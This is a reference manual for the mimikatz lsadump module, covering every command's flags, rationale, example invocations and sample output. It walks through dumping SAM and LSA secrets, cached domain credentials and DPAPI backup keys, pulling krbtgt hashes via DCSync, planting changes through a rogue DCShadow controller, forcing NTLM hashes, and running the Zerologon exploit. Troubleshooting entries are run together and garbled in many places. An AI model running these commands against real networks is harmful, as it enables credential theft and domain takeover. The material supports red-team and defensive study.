lsadump Module Reference
The lsadump module extracts or manipulates secrets that the Local Security Authority (LSA) and
related directory services maintain. The commands below are documented in the order they are
registered in the module table so that the CLI syntax mirrors the implementation.
Each subsection summarizes the goal of the command, lists the accepted flags, and explains why you
would use each option in practice. Unless noted otherwise, commands default to operating on the
local machine using the live registry and LSASS process.
lsadump::samReads the SAM database and decrypts local account password hashes. It can operate online or against
exported hive files.
| Flag | Purpose | Why use it |
|---|---|---|
/system:<path> |
Opens an offline SYSTEM hive and derives the SysKey from it. | Required when dumping hashes from offline hives where LSASS is not available; also allows point-in-time analysis. |
/sam:<path> |
Opens an offline SAM hive that pairs with the supplied SYSTEM hive. | Lets you read SAM data from another installation or from backup copies. |
Without flags the command opens the local registry and queries HKLM\SYSTEM and HKLM\SAM
through the registry APIs.【F:mimikatz/modules/kuhl_m_lsadump.c†L32-L90】
mimikatz # lsadump::sam
Domain : WORKSTATION
SysKey : 2a8e5a05ce5409321c5d1d51f40ca1ea
RID 000001F4 (Administrator)
Hash NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
RID 000001F5 (Guest)
Hash NTLM : aad3b435b51404eeaad3b435b51404ee
mimikatz # lsadump::sam /system:C:\Temp\SYSTEM /sam:C:\Temp\SAM
Domain : LABPC
SysKey : a93e0d012ac8ff2db2f1cbba91c56064
...
ERROR kuhl_m_lsadump_sam ; kull_m_registry_OpenAndQueryWithAlloc 0x00000005 – The accountSeDebugPrivilege. Run mimikatz as an elevated administrator or onERROR kull_m_registry_OpenHive ; CreateFile (C:\Temp\SAM) 0x00000002 – The specified hive/system and /sam do not come from the same snapshot thelsadump::secretsRetrieves LSA secrets such as service account passwords and DPAPI master keys. Works online or with
exported hives.
| Flag | Purpose | Why use it |
|---|---|---|
/system:<path> |
Loads an offline SYSTEM hive to recover the SysKey needed to decrypt secrets. | Essential when analyzing another system’s hives offline. |
/security:<path> |
Loads an offline SECURITY hive that contains the LSA secrets. | Required when decrypting secrets from offline registry copies. |
When no path is supplied, the command reads the local HKLM\SYSTEM and HKLM\SECURITY
keys to obtain the SysKey and the encrypted secrets before decrypting them in place.【F:mimikatz/modules/kuhl_m_lsadump.c†L103-L220】
mimikatz # lsadump::secrets
Secret : $MACHINE.ACC
Local machine account NTLM : 8026cd7d0d2664f3e0b2c672c1ab45be
Secret : DPAPI_SYSTEM
Credential BLOB : 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000...
mimikatz # lsadump::secrets /system:D:\Forensics\SYSTEM /security:D:\Forensics\SECURITY
ERROR kuhl_m_lsadump_secrets ; kull_m_registry_Open – Typically occurs when hives are lockedERROR kuhl_m_lsadump_secrets ; kull_m_dpapi_system_from_registry 0x00000057 – Indicates theSeTrustedCredmanAccessPrivilege, run mimikatz aslsadump::cacheExtracts cached domain logon data (NL$KM and DCC credentials) and optionally replaces entries for a
specific user. Accepts all parameters from lsadump::secrets plus additional cache controls.
| Flag | Purpose | Why use it |
|---|---|---|
/system:<path> |
Load an offline SYSTEM hive to derive the SysKey. | Needed when working with offline registry dumps. |
/security:<path> |
Load an offline SECURITY hive that stores cached credentials. | Required when modifying or reading caches from offline data. |
/user:<name> |
Enable “cache replace” mode for a specific user. | Allows injecting custom cache material for testing or persistence. |
/dcc:<hex> |
Provide a hexadecimal DCC hash to insert for the chosen user. | Supplies a pre-computed DCC hash when you do not want to derive it from a password. |
/ntlm:<hex> |
Provide an NTLM hash that will be turned into a DCC entry. | Useful when you only have the NTLM hash of the user. |
/password:<string> |
Let the tool derive the NTLM hash from a clear-text password. | Handy when you know the password but not the hash. |
/subject:<CN> |
Open the current user certificate store and acquire the private key of the certificate whose subject matches <CN>. |
Required to decrypt machine-bound cache data that is protected by a smart-card or certificate private key. |
The command builds the appropriate crypto context depending on the supplied arguments before
reading or editing the cached credentials.【F:mimikatz/modules/kuhl_m_lsadump.c†L103-L213】
mimikatz # lsadump::cache
NL$KM secret key : 9340a997f3fb32f651f6c2642965d1af
Domain : CONTOSO ; User : alice ; Iterations : 10240
DCC1 : 7d5a8d8f554a8a7f0acd2e0d9cc9b5df
mimikatz # lsadump::cache /user:alice /password:P@ssw0rd!
mimikatz # lsadump::cache /user:svcbackup /dcc:5f3e62d... /subject:"CN=Smart Card Logon"
ERROR kuhl_m_lsadump_cache after specifying /user but no hash – Provide one of /dcc,/ntlm, or /password so the tool knows what to inject.ERROR kull_m_certificates_get ; CertFindCertificateInStore – The certificate subject could0x00000005 access denied – Occurs without SYSTEM-level rights. Run mimikatz as SYSTEM usingpsexec, Task Scheduler, or token::elevate.lsadump::lsaQueries the SAM service through LSASS to extract user password data or supplemental credentials. The
command supports multiple access strategies to work around protections.
| Flag | Purpose | Why use it |
|---|---|---|
/patch |
Patches samsrv.dll in LSASS to bypass security checks before retrying the dump. |
Helps when direct RPC calls are blocked by hardening; performs a just-in-time in-memory patch. |
/inject |
Injects a helper thread into LSASS that executes the extraction logic. | Useful when patching is not possible but you can run code in LSASS. |
/id:<rid> |
Target a specific RID (relative identifier). | Focuses on a single account when you already know the RID. |
/name:<user> or /user:<user> |
Target a specific account by name. | Dumps credentials for one account without enumerating the entire domain. |
Without filters the command enumerates every user in the SAM domain and displays their password hashes and supplemental credentials.【F:mimikatz/modules/kuhl_m_lsadump.c†L1320-L1517】
mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
Domain : CONTOSO / S-1-5-21-...
SAMKey : 36eb5e11ba4ee6a5e73028a96b8a7707
RID 000001F4 (Administrator)
Hash NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
Supplemental Credentials...
mimikatz # lsadump::lsa /inject /name:alice
ERROR kuhl_m_lsadump_lsa with STATUS_ACCESS_DENIED – Ensure privilege::debug succeeded/patch may fail. Try /injectRPC_S_SERVER_UNAVAILABLE – The SAM service is not reachable (for remote targets). Verify thelsadump::trustLists trust relationships and extracts the shared keys used between domains.
| Flag | Purpose | Why use it |
|---|---|---|
/patch |
Temporarily patches LSASS trust routines before retrying. | Required on hardened builds where trust APIs refuse to return secrets. |
/system:<hostname> |
Perform the policy lookup on a remote system instead of the local computer. | Allows querying trust data from another domain controller when run with the proper rights. |
If patching is not requested the command opens the target LSA policy and enumerates every trusted domain, printing inbound and outbound authentication information as well as historical values.【F:mimikatz/modules/kuhl_m_lsadump.c†L1695-L1857】
mimikatz # lsadump::trust
* CONTOSO -> FABRIKAM
Incoming current : 5dc7... (AES256)
Outgoing current : 8ab1... (AES256)
mimikatz # lsadump::trust /patch /system:dc01.corp.local
LsaOpenPolicy access denied – Your account lacks SeTcbPrivilege. Run mimikatz as DomainRPC_S_SERVER_UNAVAILABLE – The remote host is unreachable. Check firewall settings andlsadump::backupkeysFetches domain backup keys (G$BCKUPKEY_*) and optionally exports them to files for later DPAPI
operations.
| Flag | Purpose | Why use it |
|---|---|---|
/guid:<GUID> |
Retrieve a specific backup key by GUID. | Lets you pull non-preferred keys directly when you already know their identifier. |
/system:<hostname> |
Query a remote LSA instance instead of the local machine. | Enables pulling backup keys from another domain controller. |
/export |
Write the recovered material to disk in addition to printing it. | Creates .pfx, .der, or .key files that can be reused by DPAPI tooling. |
/secret |
Use the LsaRetrievePrivateData secret API path. |
Necessary when remote policy handles require the secret flag. |
Without /guid the command first resolves the preferred and legacy GUIDs before retrieving and analyzing each key, exporting when requested.【F:mimikatz/modules/kuhl_m_lsadump.c†L1945-L2012】
mimikatz # lsadump::backupkeys /export
Preferred key GUID : {15d0a512-...}
* saving to : backupkey_{15d0a512-...}.pfx
mimikatz # lsadump::backupkeys /system:dc02.corp.local /guid:{2f17...} /secret
LsaOpenPolicy failures – Run with domain admin credentials and ensure the remote DC allows Remote Registry / RPC access.ERROR kuhl_m_lsadump_backupkeys_oeKey – Export failed because the output directory is not writable. Launch mimikatz from a directory where you have write access or specify another path with cd..pfx file – /export only works when the command successfully retrieved the key. Check for upstream errors and ensure the account can query backup keys.lsadump::rpdataReads arbitrary LSA private data blobs by name.
| Flag | Purpose | Why use it |
|---|---|---|
/name:<SecretName> |
The registry secret to retrieve. | Mandatory: identifies which LSA private data to dump. |
/system:<hostname> |
Query a remote LSA instance. | Use when the secret lives on another host. |
/secret |
Request the data via the secret API. | Required for some remote retrieval scenarios. |
/export |
Reserved for future export support (currently unused). | Included for completeness; no additional action today. |
If the secret is found its raw bytes are printed in hexadecimal form.【F:mimikatz/modules/kuhl_m_lsadump.c†L1997-L2012】
$MACHINE.ACC secret locally:mimikatz # lsadump::rpdata /name:$MACHINE.ACC
data : 00000000 60 00 00 00 e8 03 00 00 08 00 00 00 41 00 64 00 |`...........A.d.|
mimikatz # lsadump::rpdata /system:dc01.corp.local /name:MySecret /secret
ERROR kuhl_m_lsadump_rpdata ; kull_m_lsa_getDomainInfo – Usually triggered by insufficient rights. Run as SYSTEM or Domain Admin.ERROR kuhl_m_lsadump_rpdata ; LsaRetrievePrivateData 0xC0000034 – The secret name is wrong or does not exist. Double-check the spelling and case sensitivity./export has no effect – The flag is not implemented; remove it unless future builds add support.lsadump::dcsyncUses the DRS replication protocol to request password data for directory objects from a domain
controller.
| Flag | Purpose | Why use it |
|---|---|---|
/domain:<fqdn> |
Target a specific Active Directory domain. | Required when the current logon domain is not the one you want to replicate. |
/dc:<fqdn> or /kdc:<fqdn> |
Choose the domain controller to contact. | Ensures the request hits a reachable controller or one with particular replication data. |
/user:<samAccountName> |
Replicate a single account by name. | Typical case for extracting a specific user or the krbtgt account. |
/guid:<GUID> |
Replicate by object GUID instead of name. | Useful when the object has been renamed or you want to avoid ambiguity. |
/all |
Iterate through objects and dump the entire domain. | Performs a full replication-style dump for large-scale analysis. |
/export |
Request export-friendly attribute selection. | Limits replication to attributes that are safe to write to disk. |
/csv |
Print results in CSV format. | Simplifies automated parsing. |
/deleted |
Include deleted objects. | Important when hunting for lingering deleted accounts. |
/uac |
Decode the userAccountControl flag to human-readable form. |
Helps interpret account status quickly. |
/laps |
Resolve the attribute IDs for LAPS-managed passwords. | Necessary before requesting managed local administrator passwords. |
/authntlm |
Force NTLM authentication for the RPC binding. | Use when Kerberos/Negotiate is unavailable but NTLM is acceptable. |
Connection fine-tuning inherited from the RPC helper is also available: /service, /altservice,
/protseq, /endpoint, /noauth, /ntlm, /kerberos, /negotiate, /null, /authuser,
/authdomain, and /authpassword let you control the RPC binding and authentication context when Kerberos defaults are unsuitable.【F:mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c†L33-L202】【F:modules/rpc/kull_m_rpc.c†L147-L215】
krbtgt account using integrated credentials:mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
objectSid : S-1-5-21-...
ntlm : 15f0cf3b1d28a7e53cb17c9b6d8b12c7
supplementalCredentials (Kerberos)
mimikatz # lsadump::dcsync /domain:corp.local /all /csv /authntlm /authuser:CORP\backup /authpassword:P@ssw0rd!
mimikatz # lsadump::dcsync /domain:corp.local /guid:{bd8f...} /laps
ERROR kuhl_m_lsadump_dcsync ; kull_m_rpc_createBinding 0x000006BA – The DC is unreachable.DsReplicaSync access denied – The account lacks the Replicating Directory Changes andReplicating Directory Changes All rights. Grant the rights or use a Domain Admin account.KRB_AP_ERR_SKEW – Time skew prevents Kerberos authentication. Sync the attacking machine’s/authntlm to fall back to NTLM.lsadump::dcshadowImplements DCShadow to register a rogue domain controller, push custom replication metadata, or
manage staged modifications.
| Flag | Purpose | Why use it |
|---|---|---|
/stack |
Add the supplied object/attribute/value triplet to the in-memory request stack. | Build multi-step changes before interacting with a real DC. |
/viewstack |
Display the currently stacked changes. | Review pending modifications for accuracy. |
/clearstack |
Delete all stacked changes. | Reset the staging area without touching a DC. |
/push |
Register, push, and (if needed) unregister using the stacked data. | Executes the full DCShadow workflow automatically. |
/manualregister |
Only perform the registration phase. | Useful when you want to register now and push later. |
/manualpush |
Only push the already prepared data. | Lets you separate staging from replication. |
/manualunregister |
Explicitly unregister the rogue controller. | Cleans up without executing a full push. |
/addentry |
Directly call DRSAddEntry with the stacked object(s). |
Adds replication data without starting the listener. |
/viewreplication |
Start the server but merely observe incoming replication requests. | Good for debugging the payload that real controllers send. |
/kill:<DN> |
Trigger lingering object cleanup against the provided DN. | Removes lingering objects after a push or as a standalone operation. |
/config, /schema, /root |
Select which naming contexts are synchronized during a push. | Restrict replication to configuration or schema partitions, or default to the domain NC when /root (explicitly or implicitly) is set. |
/domain:<fqdn> |
Override the domain used to discover metadata. | Necessary when operating outside the current logon domain. |
/dc:<fqdn> |
Choose the legitimate domain controller to impersonate. | Ensures LDAP and RPC calls are directed to the intended host. |
/computer:<NetBIOS> |
Set the NetBIOS name for the fake DC (defaults to the local hostname). | Prevents name collisions or helps impersonate a specific server. |
/object, /attribute, /value |
Define the attribute data to stage when used with /stack or /addentry. |
Supplies the actual modifications that DCShadow will replicate. |
/multiple |
Allow multiple values for the same attribute. | Needed when adding multi-valued attributes. |
/clean |
Remove an object or attribute from the stack instead of adding it. | Correct staging mistakes without rebuilding the whole stack. |
/replOriginatingUid, /replOriginatingUsn, /replOriginatingTime |
Set custom replication metadata. | Craft precise replication provenance for advanced scenarios. |
/dynamic |
Mark the object as dynamic. | Required when staging dynamic objects such as DNS records. |
/remotemodify |
(with /addentry) allow remote modification semantics. |
Permits updates that would otherwise be rejected. |
Once connected to LDAP the command gathers schema, domain, and controller metadata, encodes the
stacked changes, and executes the requested workflow (registration, push, lingering cleanup, etc.).【F:mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c†L1018-L1313】【F:mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c†L2840-L3008】
mimikatz # lsadump::dcshadow /stack /object:"CN=svcaccount,OU=Service Accounts,DC=corp,DC=local" /attribute:servicePrincipalName /value:"HOST/app01.corp.local"
mimikatz # lsadump::dcshadow /push /domain:corp.local /dc:dc01.corp.local
[+] DCShadow : Registering in LDAP with GUID {4b1a...}
[+] Pushing 1 change(s) to DC dc01.corp.local
[+] Attribute servicePrincipalName updated successfully
[+] Unregistering the rogue DC
mimikatz # lsadump::dcshadow /stack /object:"CN=Test,DC=corp,DC=local" /attribute:description /value:"Updated"
mimikatz # lsadump::dcshadow /viewstack
mimikatz # lsadump::dcshadow /manualregister /domain:corp.local
mimikatz # lsadump::dcshadow /manualpush /dc:dc02.corp.local
LDAP_CONSTRAINT_VIOLATION – The attribute/value pair violates schema rules. Verify the/multiple when setting multi-valued attributes.ERROR kuhl_m_lsadump_dcshadow ; DsGetDcName – Domain discovery failed. Provide /domain and/dc explicitly, and make sure DNS can resolve both names.SeTcbPrivilege, SeMachineAccountPrivilege) are present.lsadump::setntlmDirectly sets the NTLM hash (and optionally the LM hash) for an account in SAM.
| Flag | Purpose | Why use it |
|---|---|---|
/password:<string> |
Derive the NTLM hash from a clear-text password. | Convenient when you know the password. |
/ntlm:<hex> |
Supply a 16-byte NTLM hash directly. | Use when you already have the hash. |
/user:<name> or /rid:<rid> |
Select the account to modify. | Required to identify the SAM user. |
/server:<hostname> |
Target a remote SAM server. | Enables editing passwords on another machine. |
If no credentials are provided the command uses a default known hash, making the account revert to a predictable password for later logon.【F:mimikatz/modules/kuhl_m_lsadump.c†L2128-L2176】【F:mimikatz/modules/kuhl_m_lsadump.c†L2229-L2295】
mimikatz # lsadump::setntlm /user:svcbackup /password:P@ssw0rd!
Password : P@ssw0rd!
NTLM : 5f3e62dffd1a4b3e9f82a5c8f8f8cb33
>>> User svcbackup successfully updated
mimikatz # lsadump::setntlm /server:fileserver01 /user:Administrator /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0
SamrSetInformationUser access denied – Requires administrative rights and the SeMachineAccountPrivilege (for machine targets). Use elevated credentials or run as SYSTEM.RPC_S_SERVER_UNAVAILABLE – Remote SAMR traffic is blocked. Ensure TCP/445 and 135 are open and that the Remote Registry/SAMR services are enabled./ntlm strings are 32 hexadecimal characters with no spaces.lsadump::changentlmInvokes the SAM password change RPC, supplying both the current and the desired password material.
| Flag | Purpose | Why use it |
|---|---|---|
/oldpassword:<string> or /oldntlm:<hex> |
Provide the current credentials. | Required so SAM will authorize the change. |
/newpassword:<string> or /newntlm:<hex> |
Provide the new credentials. | Defines the replacement password. |
/user:<name> or /rid:<rid> |
Select the account. | Mandatory target selector. |
/server:<hostname> |
Point to a remote SAM server. | Allows remote password changes over SAMR. |
If the old or new credentials are omitted the command reuses the built-in default hash, which can be useful for quickly forcing known values onto machine accounts.【F:mimikatz/modules/kuhl_m_lsadump.c†L2168-L2238】【F:mimikatz/modules/kuhl_m_lsadump.c†L2239-L2295】
mimikatz # lsadump::changentlm /user:svcbackup /oldpassword:P@ssw0rd! /newpassword:S3cur3!
Old NTLM : 5f3e62dffd1a4b3e9f82a5c8f8f8cb33
New NTLM : d2d2e8436a9a2b9c8f7d0b9aa3b4c123
>>> Password successfully changed
mimikatz # lsadump::changentlm /user:COMPUTER$ /newntlm:31d6cfe0d16ae931b73c59d7e0c089c0
STATUS_WRONG_PASSWORD – The supplied /oldpassword or /oldntlm does not match the currentRPC_S_ACCESS_DENIED – The account lacks permission to change the target password. Use anSamrChangePasswordUser fails on remote hosts – Ensure the Remote Registry and SAMR serviceslsadump::netsyncSpeaks the Netlogon protocol to retrieve current and previous NTLM hashes for domain controllers or
servers.
| Flag | Purpose | Why use it |
|---|---|---|
/dc:<fqdn> |
Target the domain controller. | Mandatory because Netlogon is a server-to-server protocol. |
/user:<account> |
Authenticate as the specified machine or domain account. | Required to build the Netlogon credential chain. |
/account:<name> |
Override the account whose passwords are requested (defaults to /user). |
Allows querying trust accounts different from the authenticating identity. |
/computer:<NetBIOS> |
Provide the client computer name (defaults to mimikatz). |
Needed when emulating a specific workstation. |
/ntlm:<hex> |
Supply the current NTLM hash for the authenticating account. | Required to derive the Netlogon session key. |
RPC connection modifiers (/remote, /protseq, /service, /endpoint, /noauth, /ntlm,
/kerberos, /negotiate, /null, /authuser, /authdomain, /authpassword) are also available
through the shared helper when finer control over the transport is needed.【F:mimikatz/modules/kuhl_m_lsadump.c†L2013-L2073】【F:modules/rpc/kull_m_rpc.c†L147-L215】
mimikatz # lsadump::netsync /dc:dc01.corp.local /user:CORP\dc01$ /ntlm:1f9a...
SecureChannelType : ServerSecureChannel
Current NTLM : 4a5e3cfa2b4b8d6571f0d8ad2a1c3f40
Previous NTLM : 7c8d5e2f8a4d9c6b1e0fdd2ca5b1c4d2
mimikatz # lsadump::netsync /dc:dc01.corp.local /user:CORP\dc01$ /ntlm:1f9a... /account:CONTOSO$
STATUS_NOT_SUPPORTED – Some patched domain controllers block the vulnerable Netlogon flow.NetlogonComputeServerDigest mismatch – Indicates the supplied /ntlm hash is wrong. Confirm/remote or other modifiers are used incorrectly, fall back to the/protseq:ncacn_ip_tcp explicitly.lsadump::packagesEnumerates installed SSPI packages and optionally runs an outbound authentication sequence to obtain the first token buffer.
| Argument | Purpose | Why use it |
|---|---|---|
[target] |
Optional SPN or target name passed to InitializeSecurityContext. |
Use to observe the initial blob a package sends during authentication. |
Each package is listed with capabilities, maximum token size, RPC ID, and version. When a target is provided the command acquires outbound credentials and prints the produced token in hexadecimal so it can be replayed or analyzed.【F:mimikatz/modules/kuhl_m_lsadump.c†L2356-L2393】
mimikatz # lsadump::packages
mimikatz # lsadump::packages
Name : Negotiate
Description : Microsoft Package Negotiator
Capabilities: 00883bb3 ( INTEGRITY ; PRIVACY ; CONNECTION ; MULTI_REQUIRED ; EXT
ENDED_ERROR ; IMPERSONATION ; ACCEPT_WIN32_NAME ; NEGOTIABLE ; GSS_COMPATIBLE ;
LOGON ; RESTRICTED_TOKENS ; APPCONTAINER_CHECKS ; )
MaxToken : 48256
RPCID : 0x0009 (9)
Version : 1
Name : Kerberos
Description : Microsoft Kerberos V1.0
Capabilities: 028f3bbf ( INTEGRITY ; PRIVACY ; TOKEN_ONLY ; DATAGRAM ; CONNECTIO
N ; MULTI_REQUIRED ; EXTENDED_ERROR ; IMPERSONATION ; ACCEPT_WIN32_NAME ; NEGOTI
ABLE ; GSS_COMPATIBLE ; LOGON ; MUTUAL_AUTH ; DELEGATION ; READONLY_WITH_CHECKSU
M ; RESTRICTED_TOKENS ; APPCONTAINER_CHECKS ; ? ; )
MaxToken : 48000
RPCID : 0x0010 (16)
Version : 1
mimikatz # lsadump::packages cifs/dc01.corp.local
[Kerberos] Initial token (len=512)
0000 60 82 01 20 06 09 2a 86 48 82 f7 12 01 02 02 01 |`.. ..*.H.......|
AcquireCredentialsHandle fails – The current logon session lacks credentials for the package.sekurlsa::logonpasswords to locate a usable token or run as the target user.InitializeSecurityContext returns SEC_E_TARGET_UNKNOWN – The SPN is invalid. Verify thelsadump::mbcDisplays the machine-bound certificate (MBC) material stored in the registry.
| Flag | Purpose | Why use it |
|---|---|---|
/system:<path> |
Load an offline SYSTEM hive. | Necessary when dumping MBC data from a copied hive. |
Without parameters the command reads the local machine’s registry to locate the
MachineBoundCertificate blob and prints it via the DPAPI helper routines.【F:mimikatz/modules/kuhl_m_lsadump.c†L2395-L2444】
mimikatz # lsadump::mbc
MachineBoundCertificate :
0000 30 82 03 7a 30 82 02 62 a0 03 02 01 02 02 10 43 |0..z0..b.......C|
mimikatz # lsadump::mbc /system:E:\Offline\SYSTEM
ERROR kuhl_m_lsadump_mbc – Often caused by missing DPAPI master keys. Make sure lsadump::secretsCreateFile errors – The offline SYSTEM hive path is invalid. Verify the path and that mimikatzlsadump::zerologonTests or exploits CVE-2020-1472 against a domain controller’s Netlogon service.
| Flag | Purpose | Why use it |
|---|---|---|
/account:<DC$> |
Specify the target machine account. | Mandatory to craft the challenge/response sequence. |
/type:<id> |
Override the secure channel type (default: server). | Needed when attacking trust relationships instead of DC accounts. |
/exploit |
Switch from detection mode to actively resetting the password to zeroes. | Use cautiously when you intend to take over the target account. |
RPC binding options from the helper (/remote, /protseq, /service, /endpoint, /noauth,
/ntlm, /kerberos, /negotiate, /null, /authuser, /authdomain, /authpassword) are
available to reach the Netlogon endpoint under different transport conditions.【F:mimikatz/modules/kuhl_m_lsadump.c†L2470-L2590】【F:modules/rpc/kull_m_rpc.c†L147-L215】
mimikatz # lsadump::zerologon /account:DC01$
Testing Netlogon secure channel for DC01$...
[+] Server is vulnerable (challenge accepted)
mimikatz # lsadump::zerologon /account:DC01$ /exploit
[+] Server is vulnerable, attempting exploit
[+] Machine account password reset to 0
mimikatz # lsadump::zerologon /account:CONTOSO$ /type:2 /exploit
STATUS_NOT_SUPPORTED – The domain controller is patched. No remediation other than choosingERROR kuhl_m_lsadump_zerologon ; kull_m_rpc_createBinding 0x000006BA – RPC connection failed.lsadump::postzerologon immediately to restore a known password.lsadump::postzerologonResets a domain controller’s machine account password and stored secret after a successful
ZeroLogon-style takeover.
| Flag | Purpose | Why use it |
|---|---|---|
/target:<hostname> |
Domain controller whose password should be reset. | Required to open the right SAM and LSA handles. |
/account:<DC$> |
Machine account name that should receive the new password. | Identifies which machine account to fix. |
The command first changes the SAM password to a known constant and then updates the $MACHINE.ACC LSA secret so the controller and the domain stay in sync.【F:mimikatz/modules/kuhl_m_lsadump.c†L2562-L2638】
/exploit:mimikatz # lsadump::postzerologon /target:dc01.corp.local /account:DC01$
[+] Changing SAM password for DC01$
[+] Updating LSA secret $MACHINE.ACC
[+] Domain controller password restored
RPC_S_ACCESS_DENIED – Requires Domain Admin or equivalent rights. Run mimikatz withERROR kuhl_m_lsadump_postzerologon with STATUS_NO_SUCH_USER – The /account name is wrong.$ and the case.